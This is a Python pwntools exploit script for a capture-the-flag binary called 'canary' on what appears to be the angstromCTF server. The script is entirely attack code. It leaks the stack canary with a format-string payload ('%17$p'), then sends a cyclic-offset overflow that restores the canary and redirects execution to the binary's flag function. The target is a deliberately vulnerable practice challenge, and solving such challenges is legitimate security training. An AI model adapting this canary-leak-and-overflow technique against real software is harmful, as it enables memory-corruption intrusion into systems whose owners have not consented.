```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('canary')
context.terminal = ['tmux', 'new-window']

host = args.HOST or 'shell.actf.co'
port = int(args.PORT or 20701)

def local(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io

def start(argv=[], *a, **kw):
if args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)

gdbscript = '''
tbreak *0x00400936
continue
'''.format(**locals())

io = start()
io.recvuntil(b"name?")
io.sendline("%17$p");
io.recvuntil(b"you, 0x")

canary = io.recvuntil("!\n", drop=True)
if len(canary) == 15:
canary = b'0' + canary

canary = u64(unhex(canary), endian="big")

# payload = cyclic(100, n=8) - on first run to find 'haaaaaaa' in RAX
payload = fit({
cyclic_find(b'haaaaaaa', n=8): canary,
cyclic_find(0x61616173): exe.sym.flag
}, length=100)

io.recvuntil("me?", drop=True)
io.sendline(payload)
log.info(io.recvline())

# io.interactive()
```